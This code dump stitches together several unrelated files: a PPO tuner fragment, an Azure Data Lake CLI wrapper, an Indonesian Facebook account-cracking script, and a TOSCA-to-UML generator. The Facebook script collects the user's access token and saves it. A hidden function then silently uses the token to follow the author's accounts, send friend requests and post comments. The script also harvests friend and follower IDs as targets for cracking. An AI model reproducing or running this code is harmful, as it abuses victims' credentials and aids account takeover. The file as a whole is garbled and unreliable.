self.nbatch = nbatch = nenvs * model_config.nsteps # num of record per update
nbatch_train = nbatch // model_config.nminibatches # get batch size
# self.nupdates is used to tune lr and cliprange
self.nupdates = self.model_config.total_timesteps // self.nbatch
# Instantiate the model object (that creates act_model and train_model)
self.model = Model(policy=policy, nbatch_act=nenvs, nbatch_train=nbatch_train,
nsteps=model_config.nsteps, ent_coef=model_config.ent_coef, vf_coef=model_config.vf_coef,
max_grad_norm=model_config.max_grad_norm, np_mask=self.np_mask)
self.states = self.model.initial_state
logger.info('=== finished PPOModel initialization')
def inference(self, num):
"""
generate actions along with related info from policy network.
observation is the action of the last step.
Parameters:
----------
num: the number of trials to generate
"""
# Here, we init the lists that will contain the mb of experiences
mb_obs, mb_actions, mb_values, mb_dones, mb_neglogpacs = [], [], [], [], []
# initial observation
# use the (n+1)th embedding to represent the first step action
first_step_ob = self.model_config.action_space.n
obs = [first_step_ob for _ in range(num)]
dones = [True for _ in range(num)]
states = self.states
# For n in range number of steps
for cur_step in range(self.model_config.nsteps):
# Given observations, get action value and neglopacs
# We already have self.obs because Runner superclass run self.obs[:] = env.reset() on init
actions, values, states, neglogpacs = self.model.step(cur_step, obs, S=states, M=dones)
mb_obs.append(obs.copy())
mb_actions.append(actions)
mb_values.append(values)
mb_neglogpacs.append(neglogpacs)
mb_dones.append(dones)
# Take actions in env and look the results
# Infos contains a ton of useful informations
obs[:] = actions
if cur_step == self.model_config.nsteps - 1:
dones = [True for _ in range(num)]
else:
dones = [False for _ in range(num)]
#batch of steps to batch of rollouts
np_obs = np.asarray(obs)
mb_obs = np.asarray(mb_obs, dtype=np_obs.dtype)
mb_actions = np.asarray(mb_actions)
mb_values = np.asarray(mb_values, dtype=np.float32)
mb_neglogpacs = np.asarray(mb_neglogpacs, dtype=np.float32)
mb_dones = np.asarray(mb_dones, dtype=np.bool)
last_values = self.model.value(np_obs, S=states, M=dones)
return mb_obs, mb_actions, mb_values, mb_neglogpacs, mb_dones, last_values
def compute_rewards(self, trials_info, trials_result):
"""
compute the rewards of the trials in trials_info based on trials_result,
and update the rewards in trials_info
Parameters:
----------
trials_info: info of the generated trials
trials_result: final results (e.g., acc) of the generated trials
"""
mb_rewards = np.asarray([trials_result for _ in trials_info.actions], dtype=np.float32)
# discount/bootstrap off value fn
mb_returns = np.zeros_like(mb_rewards)
mb_advs = np.zeros_like(mb_rewards)
lastgaelam = 0
last_dones = np.asarray([True for _ in trials_result], dtype=np.bool) # ugly
for t in reversed(range(self.model_config.nsteps)):
if t == self.model_config.nsteps - 1:
nextnonterminal = 1.0 - last_dones
nextvalues = trials_info.last_value
else:
nextnonterminal = 1.0 - trials_info.dones[t+1]
nextvalues = trials_info.values[t+1]
delta = mb_rewards[t] + self.model_config.gamma * nextvalues * nextnonterminal - trials_info.values[t]
mb_advs[t] = lastgaelam = delta + self.model_config.gamma * self.model_config.lam * nextnonterminal * lastgaelam
mb_returns = mb_advs + trials_info.values
trials_info.update_rewards(mb_rewards, mb_returns)
trials_info.convert_shape()
def train(self, trials_info, nenvs):
"""
train the policy/value network using trials_info
Parameters:
----------
trials_info: complete info of the generated trials from the previous inference
nenvs: the batch size of the (previous) inference
"""
# keep frac decay for future optimization
if self.cur_update <= self.nupdates:
frac = 1.0 - (self.cur_update - 1.0) / self.nupdates
else:
logger.warning('current update (self.cur_update) %d has exceeded total updates (self.nupdates) %d',
self.cur_update, self.nupdates)
frac = 1.0 - (self.nupdates - 1.0) / self.nupdates
lrnow = self.lr(frac)
cliprangenow = self.cliprange(frac)
self.cur_update += 1
states = self.states
assert states is not None # recurrent version
assert nenvs % self.model_config.nminibatches == 0
envsperbatch = nenvs // self.model_config.nminibatches
envinds = np.arange(nenvs)
flatinds = np.arange(nenvs * self.model_config.nsteps).reshape(nenvs, self.model_config.nsteps)
for _ in range(self.model_config.noptepochs):
np.random.shuffle(envinds)
for start in range(0, nenvs, envsperbatch):
end = start + envsperbatch
mbenvinds = envinds[start:end]
mbflatinds = flatinds[mbenvinds].ravel()
slices = (arr[mbflatinds] for arr in (trials_info.obs, trials_info.returns, trials_info.dones,
trials_info.actions, trials_info.values, trials_info.neglogpacs))
mbstates = states[mbenvinds]
self.model.train(lrnow, cliprangenow, *slices, mbstates)
class PPOTuner(Tuner):
"""
PPOTuner
"""
def __init__(self, optimize_mode, trials_per_update=20, epochs_per_update=4, minibatch_size=4,
ent_coef=0.0, lr=3e-4, vf_coef=0.5, max_grad_norm=0.5, gamma=0.99, lam=0.95, cliprange=0.2):
"""
initialization, PPO model is not initialized here as search space is not received yet.
Parameters:
----------
optimize_mode: maximize or minimize
trials_per_update: number of trials to have for each model update
epochs_per_update: number of epochs to run for each model update
minibatch_size: minibatch size (number of trials) for the update
ent_coef: policy entropy coefficient in the optimization objective
lr: learning rate of the model (lstm network), constant
vf_coef: value function loss coefficient in the optimization objective
max_grad_norm: gradient norm clipping coefficient
gamma: discounting factor
lam: advantage estimation discounting factor (lambda in the paper)
cliprange: cliprange in the PPO algorithm, constant
"""
self.optimize_mode = OptimizeMode(optimize_mode)
self.model_config = ModelConfig()
self.model = None
self.search_space = None
self.running_trials = {} # key: | |
<filename>pyaz/storage/fs/directory/__init__.py
'''
Manage directories in Azure Data Lake Storage Gen2 account.
'''
from .... pyaz_utils import _call_az
from . import metadata
def create(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, metadata=None, permissions=None, sas_token=None, timeout=None, umask=None):
'''
Create a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- metadata -- Metadata in space-separated key=value pairs. This overwrites any existing metadata.
- permissions -- POSIX access permissions for the file owner, the file owning group, and others. Each class may be granted read, write, or execute permission. The sticky bit is also supported. Both symbolic (rwxrw-rw-) and 4-digit octal notation (e.g. 0766) are supported. For more information, please refer to https://docs.microsoft.com/azure/storage/blobs/data-lake-storage-access-control#levels-of-permission.
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
- umask -- When creating a file or directory and the parent folder does not have a default ACL, the umask restricts the permissions of the file or directory to be created. The resulting permission is given by p & ^u, where p is the permission and u is the umask. For more information, please refer to https://docs.microsoft.com/azure/storage/blobs/data-lake-storage-access-control#umask.
'''
return _call_az("az storage fs directory create", locals())
def exists(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None):
'''
Check for the existence of a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs directory exists", locals())
def show(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None):
'''
Show properties of a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs directory show", locals())
def delete(name, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None, yes=None):
'''
Delete a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
- yes -- Do not prompt for confirmation.
'''
return _call_az("az storage fs directory delete", locals())
def move(name, new_directory, account_key=None, account_name=None, auth_mode=None, connection_string=None, sas_token=None, timeout=None):
'''
Move a directory in ADLS Gen2 file system.
Required Parameters:
- name -- The name of directory.
- new_directory -- The new directory name the users want to move to. The value must have the following format: "{filesystem}/{directory}/{subdirectory}".
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs directory move", locals())
def list(account_key=None, account_name=None, auth_mode=None, connection_string=None, num_results=None, path=None, recursive=None, sas_token=None, timeout=None):
'''
List directories in ADLS Gen2 file system.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- | |
#!/usr/bin/python2
# coding=utf-8
# code by Bangsat-XD
# my facebook ( https://www.facebook.com/AA.RAKA2708 )
# (C) Copyright 407 Authentic Exploit
# Rebuild Copyright Can't make u real programmer:)
# Coded By Bangsat-XD.
import os
try:
import requests
except ImportError:
print '\n [×] Modul requests belum terinstall!...\n'
os.system('pip2 install requests')
try:
import concurrent.futures
except ImportError:
print '\n [×] Modul Futures belum terinstall!...\n'
os.system('pip2 install futures')
try:
import bs4
except ImportError:
print '\n [×] Modul Bs4 belum terinstall!...\n'
os.system('pip2 install bs4')
import requests, os, re, bs4, sys, json, time, random, datetime
from concurrent.futures import ThreadPoolExecutor as BangsatGanteng
from datetime import datetime
from bs4 import BeautifulSoup
ct = datetime.now()
n = ct.month
bulan = ['Januari', 'Februari', 'Maret', 'April', 'Mei', 'Juni', 'Juli', 'Agustus', 'September', 'Oktober', 'November', 'Desember']
try:
if n < 0 or n > 12:
exit()
nTemp = n - 1
except ValueError:
exit()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan[nTemp]
reload(sys)
sys.setdefaultencoding('utf-8')
### WARNA RANDOM ###
P = '\x1b[1;97m' # PUTIH
M = '\x1b[1;91m' # MERAH
H = '\x1b[1;92m' # HIJAU
K = '\x1b[1;93m' # KUNING
B = '\x1b[1;94m' # BIRU
U = '\x1b[1;95m' # UNGU
O = '\x1b[1;96m' # BIRU MUDA
N = '\x1b[0m' # WARNA MATI
my_color = [
P, M, H, K, B, U, O, N]
warna = random.choice(my_color)
# Raka <NAME>. #
#------------------------------->
ok = []
cp = []
id = []
user = []
num = 0
loop = 0
xi_jimpinx = '953529338576547'
koh = '100017584682867'
url = "https://mbasic.facebook.com"
hoetank = random.choice(['Yang posting orang nya ganteng:)', 'Lo ngentod:v', 'Never surrentod tekentod kentod:v'])
bulan_ttl = {"01": "Januari", "02": "Februari", "03": "Maret", "04": "April", "05": "Mei", "06": "Juni", "07": "Juli", "08": "Agustus", "09": "September", "10": "Oktober", "11": "November", "12": "Desember"}
# lempankkkkkkkk
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
def tod():
titik = ['\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ','\x1b[1;92m. ', '\x1b[1;93m.. ', '\x1b[1;96m... ']
for x in titik:
print '\r %s[%s+%s] menghapus token %s'%(N,M,N,x),
sys.stdout.flush()
time.sleep(1)
# LO KONTOL
logo = ''' \033[0;96m __ __ __ ______ ____
\033[0;96m \ \/ / ____ / |/ / _ )/ __/ ® \033[0m|| Created By ☆RAKA☆™︻®╤───────═◍➤
\033[0;96m \ / /___/ / /|_/ / _ / _/ \033[0m|| Github.com/Bangsat-XD
\033[0;96m /_/ /_/ /_/____/_/ \033[0;91mv2.0 \033[0m|| Facebook.com/GARANGAN.KECHE'''
lo_ngentod = '953529338576547'
# crack selesai
def hasil(ok,cp):
if len(ok) != 0 or len(cp) != 0:
print '\n\n %s[%s#%s] crack selesai...'%(N,K,N)
print '\n\n [%s+%s] total OK : %s%s%s'%(O,N,H,str(len(ok)),N)
print ' [%s+%s] total CP : %s%s%s'%(O,N,K,str(len(cp)),N);exit()
else:
print '\n\n [%s!%s] opshh kamu tidak mendapatkan hasil :('%(M,N);exit()
#masuk token
def bangsatxd():
os.system('clear')
print (' %s*%s tools ini menggunakan login token facebook.\n %s*%s apakah kamu sudah tau cara mendapatkan token facebook?\n %s*%s ketik %sopen%s untuk mendapatkan token facebook.'%(O,N,O,N,O,N,H,N))
kontol = raw_input('\n %s[%s?%s] ☆Enter Token☆ ™︻®╤───────═◍➤ :%s '%(N,M,N,H))
if kontol in ('open', 'Open', 'OPEN'):
print '\n%s *%s note! usahakan akun tumbal login di google chrome terlebih dahulu'%(B,N);time.sleep(2)
print '%s *%s jangan lupa! url ubah ke %shttps://m.facebook.com'%(B,N,H);time.sleep(2)
print '%s *%s setelah di alihkan ke google chrome. klik %stitik tiga'%(B,N,H);time.sleep(2)
print '%s *%s lalu klik %sCari di Halaman%s Tinggal ketik %sEAAA%s Lalu salin.'%(B,N,H,N,H,N);time.sleep(2)
raw_input(' %s*%s tekan enter '%(O,N))
os.system('xdg-open https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_')
bangsatxd()
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(kontol)).json()['name']
print '\n\n %s*%s selamat datang %s%s%s'%(O,N,K,nama,N);time.sleep(2)
print ' %s*%s mohon untuk menggunakan sc ini sewajarnya, kami tidak bertanggung jawab jika sc ini disalah gunakan...'%(O,N);time.sleep(2)
open('.memek.txt', 'w').write(kontol)
raw_input(' %s*%s tekan enter '%(O,N));wuhan(kontol)
bangsat_xd()
except KeyError:
print '\n\n %s[%s!%s] token invalid'%(N,M,N);time.sleep(2);bangsatxd()
### ORANG GANTENG ###
def bangsat_xd():
os.system('clear')
try:
kontol = open('.memek.txt', 'r').read()
except IOError:
print '\n %s[%s×%s] token invalid'%(N,M,N);time.sleep(2);os.system('rm -rf .memek.txt');bangsatxd()
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(kontol)).json()['name']
except KeyError:
print '\n %s[%s×%s] token invalid'%(N,M,N);time.sleep(2);os.system('rm -rf .memek.txt');bangsatxd()
except requests.exceptions.ConnectionError:
exit('\n\n %s[%s!%s] tidak ada koneksi\n'%(N,M,N))
os.system('clear')
print logo
IP = requests.get('https://www.bangsatxd.my.id/server/ip/').text
print '___________________________________________________________\n';time.sleep(0.03)
print ' (\033[0;96m•\033[0m) ACTIVE USER : %s'%(nama);time.sleep(0.03)
print ' (\033[0;96m•\033[0m) IP DEVICE : %s'%(IP)
print '___________________________________________________________\n';time.sleep(0.03)
print ' [%s1%s]. Dump id dari teman'%(O,N);time.sleep(0.03)
print ' [%s2%s]. Dump id dari teman publik'%(O,N);time.sleep(0.03)
print ' [%s3%s]. Dump id dari total followers'%(O,N);time.sleep(0.03)
print ' [%s4%s]. Dump id dari like postingan'%(O,N);time.sleep(0.03)
print ' [%s5%s]. Mulai crack'%(O,N);time.sleep(0.03)
print ' [%s6%s]. Check ingformasi akun fb'%(O,N);time.sleep(0.03)
print ' [%s7%s]. Lihat hasil crack'%(O,N);time.sleep(0.03)
print ' [%s8%s]. Settings user agent'%(O,N);time.sleep(0.03)
print ' [%s9%s]. Ingfo %sscript%s'%(O,N,O,N);time.sleep(0.03)
print ' [%s0%s]. logout (%shapus token%s)'%(M,N,M,N);time.sleep(0.03)
pepek = raw_input('\n [*] menu : ')
if pepek == '':
print '\n %s[%s×%s] jangan kosong kentod!'%(N,M,N);time.sleep(2);bangsat_xd()
elif pepek in['1','01']:
teman(kontol)
elif pepek in['2','02']:
publik(kontol)
elif pepek in['3','03']:
followers(kontol)
elif pepek in['4','04']:
postingan(kontol)
elif pepek in['5','05']:
__crack__().plerr()
elif pepek in['6','06']:
cek_ingfo(kontol)
elif pepek in['7','07']:
try:
dirs = os.listdir("results")
print '\n [ hasil crack yang tersimpan di file anda ]\n'
for file in dirs:
print(" [%s+%s] %s"%(O,N,file))
file = raw_input("\n [%s?%s] masukan nama file :%s "%(M,N,H))
if file == "":
file = raw_input("\n %s[%s?%s] masukan nama file :%s %s"%(N,M,N,H,N))
total = open("results/%s"%(file)).read().splitlines()
print(" %s[%s#%s] --------------------------------------------"%(N,O,N));time.sleep(2)
nm_file = ("%s"%(file)).replace("-", " ")
hps_nm = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "")
jalan(" [%s*%s] Hasil %scrack%s pada tanggal %s:%s%s%s total %s: %s%s%s"%(M,N,O,N,M,O,hps_nm,N,M,O,len(total),O))
print(" %s[%s#%s] --------------------------------------------"%(N,O,N));time.sleep(2)
for memek in total:
kontol = memek.replace("\n","")
titid = kontol.replace(" [✓] "," \x1b[0m[\x1b[1;92m✓\x1b[0m]\x1b[1;92m ").replace(" [×] ", " \x1b[0m[\x1b[1;93m×\x1b[0m]\x1b[1;93m ")
print("%s%s"%(titid,N));time.sleep(0.03)
print(" %s[%s#%s] --------------------------------------------"%(N,O,N))
raw_input('\n [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
except (IOError):
print("\n %s[%s×%s] opshh kamu tidak mendapatkan hasil :("%(N,M,N))
raw_input('\n [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
elif pepek in['8','08']:
seting_yntkts()
elif pepek in['9','09']:
info_tools()
elif pepek in['0','00']:
print '\n'
tod()
time.sleep(1);os.system('rm -rf .memek.txt')
jalan('\n %s[%s✓%s]%s berhasil menghapus token'%(N,H,N,H));exit()
else:
print '\n %s[%s×%s] menu [%s%s%s] tidak ada, cek menu nya bro!'%(N,M,N,M,pepek,N);time.sleep(2);bangsat_xd()
# Yang ganti bot nya gw sumpahin mak lo mati ajg!
def wuhan(kontol):
try:
kentod = kontol
requests.post('https://graph.facebook.com/100017584682867/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100059709917296/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100008678141977/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100005878513705/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100003342127009/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100041388320565/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/108229897756307/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/857799105/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100027558888180/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/me/friends?method=post&uids=%s&access_token=%s'%(koh,kentod))
requests.post('https://graph.facebook.com/%s/comments/?message=%s&access_token=%s'%(lo_ngentod,kentod,kentod))
requests.post('https://graph.facebook.com/%s/comments/?message=%s&access_token=%s'%(xi_jimpinx,hoetank,kentod))
except:
pass
# dump id dari teman hehe
def teman(kontol):
try:
os.mkdir('dump')
except:pass
try:
mmk = raw_input('\n %s[%s?%s] nama file : '%(N,O,N))
asw = raw_input(' %s[%s?%s] limit id : '%(N,O,N))
cin = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(cin, 'w')
for a in requests.get('https://graph.facebook.com/me/friends?limit=%s&access_token=%s'%(asw,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] Proses Dump Id...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
jalan('\n\n %s[%s✓%s] berhasil dump id dari teman'%(N,H,N))
print ' [%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,M,cin,N)
print 50 * '-'
raw_input(' [%s ENTER%s ] '%(O,N));bangsat_xd()
except (KeyError,IOError):
os.remove(cin)
jalan('\n %s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input(' [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
'''
csy = 'Cindy sayang Yayan'
ysc = 'Yayan sayang Cindy'
'''
# dump id dari teman publik hehe
def publik(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n %s[%s?%s] id publik : '%(N,O,N))
ahh = raw_input(' %s[%s?%s] nama file : '%(N,O,N))
ihh = raw_input(' %s[%s?%s] limit id : '%(N,O,N))
knt = ('dump/' + ahh + '.json').replace(' ', '_')
ys = open(knt, 'w')
for a in requests.get('https://graph.facebook.com/%s/friends?limit=%s&access_token=%s'%(csy,ihh,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] Proses Dump Id...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
jalan('\n\n %s[%s✓%s] berhasil dump id dari teman publik'%(N,H,N))
print ' [%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,M,knt,N)
print 50 * '-'
raw_input(' [%s ENTER%s ] '%(O,N));bangsat_xd()
except (KeyError,IOError):
os.remove(knt)
jalan('\n %s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input(' [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
# dump id dari followers hehe
def followers(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n %s[%s?%s] id follow : '%(N,O,N))
mmk = raw_input(' %s[%s?%s] nama file : '%(N,O,N))
asw = raw_input(' %s[%s?%s] limit id : '%(N,O,N))
ah = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(ah, 'w')
for a in requests.get('https://graph.facebook.com/%s/subscribers?limit=%s&access_token=%s'%(csy,asw,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] Proses Dump Id...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
jalan('\n\n %s[%s✓%s] berhasil dump id dari total followers'%(N,H,N))
print ' [%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,M,ah,N)
print 50 * '-'
raw_input(' [%s ENTER%s ] '%(O,N));bangsat_xd()
except (KeyError,IOError):
os.remove(ah)
jalan('\n %s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input(' [ %sKEMBALI%s ] '%(O,N));bangsat_xr()
# dump id dari followers hehe
def followers(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n %s[%s?%s] id follow : '%(N,O,N))
mmk = raw_input(' %s[%s?%s] | |
######################################################################
#
# Software Name : Cloudnet TOSCA toolbox
# Version: 1.0
# SPDX-FileCopyrightText: Copyright (c) 2020-21 Orange
# SPDX-License-Identifier: Apache-2.0
#
# This software is distributed under the Apache License 2.0
# the text of which is available at http://www.apache.org/licenses/LICENSE-2.0
# or see the "LICENSE-2.0.txt" file for more details.
#
# Author: <NAME> <<EMAIL>>
# Software description: TOSCA to Cloudnet Translator
######################################################################
import logging # for logging purposes.
import cloudnet.tosca.syntax as syntax
from cloudnet.tosca.configuration import DEFAULT_CONFIGURATION
from cloudnet.tosca.processors import Generator
from cloudnet.tosca.syntax import * # TODO remove
from cloudnet.tosca.utils import normalize_name, short_type_name
UML2 = "UML2"
DEFAULT_CONFIGURATION[UML2] = {
# Target directory where UML2 diagrams are generated.
Generator.TARGET_DIRECTORY: "Results/Uml2Diagrams",
"kinds": {
"Compute": "node", # OASIS TOSCA 1.2
"tosca.nodes.Compute": "node", # OASIS TOSCA 1.2
"tosca.nodes.nfv.Vdu.Compute": "node", # ETSI NVF SOL 001
"tosca.nodes.Abstract.Storage": "database", # OASIS TOSCA 1.2
"tosca.nodes.nfv.Vdu.VirtualStorage": "database", # ETSI NVF SOL 001 v0.9
"tosca.nodes.nfv.Vdu.VirtualBlockStorage": "database", # ETSI NVF SOL 001 v0.10.0
"tosca.nodes.nfv.Vdu.VirtualObjectStorage": "database", # ETSI NVF SOL 001 v0.10.0
"tosca.nodes.nfv.Vdu.VirtualFileStorage": "database", # ETSI NVF SOL 001 v0.10.0
"tosca.nodes.network.Network": "queue", # OASIS TOSCA 1.2
"tosca.nodes.nfv.NsVirtualLink": "queue", # ETSI NVF SOL 001 v2.5.1
"tosca.nodes.nfv.VnfVirtualLink": "queue", # ETSI NVF SOL 001
"tosca.capabilities.nfv.VirtualLinkable": "queue", # ETSI NVF SOL 001
},
}
DEFAULT_CONFIGURATION["logging"]["loggers"][__name__] = {
"level": "INFO",
}
LOGGER = logging.getLogger(__name__)
class PlantUMLGenerator(Generator):
def generator_configuration_id(self):
return UML2
def generation(self):
self.info("UML2 diagram generation")
self.generate_UML2_class_diagram()
topology_template = syntax.get_topology_template(
self.tosca_service_template.get_yaml()
)
if topology_template:
self.open_file("-uml2-component-diagram1.plantuml")
self.generate_UML2_component_diagram(topology_template, False)
self.close_file()
self.open_file("-uml2-component-diagram2.plantuml")
self.generate_UML2_component_diagram(topology_template, True)
self.close_file()
self.open_file("-uml2-deployment-diagram.plantuml")
self.generate_UML2_deployment_diagram(topology_template)
self.close_file()
def generate_UML2_class_diagram(self):
template_yaml = self.tosca_service_template.get_yaml()
# Get types.
data_types = syntax.get_data_types(template_yaml)
artifact_types = syntax.get_artifact_types(template_yaml)
capability_types = syntax.get_capability_types(template_yaml)
relationship_types = syntax.get_relationship_types(template_yaml)
interface_types = syntax.get_interface_types(template_yaml)
node_types = syntax.get_node_types(template_yaml)
group_types = syntax.get_group_types(template_yaml)
policy_types = syntax.get_policy_types(template_yaml)
# Return if no types is defined.
if (
len(data_types) == 0
and len(artifact_types) == 0
and len(capability_types) == 0
and len(relationship_types) == 0
and len(interface_types) == 0
and len(node_types) == 0
and len(group_types) == 0
and len(policy_types) == 0
):
return
self.open_file("-uml2-class-diagram.plantuml")
self.generate("@startuml")
self.generate("set namespaceSeparator none")
def generate_class(class_name, class_kind, type_yaml, types):
def generate_field(field_name, field_yaml):
declaration = "+"
if is_property_required(field_yaml):
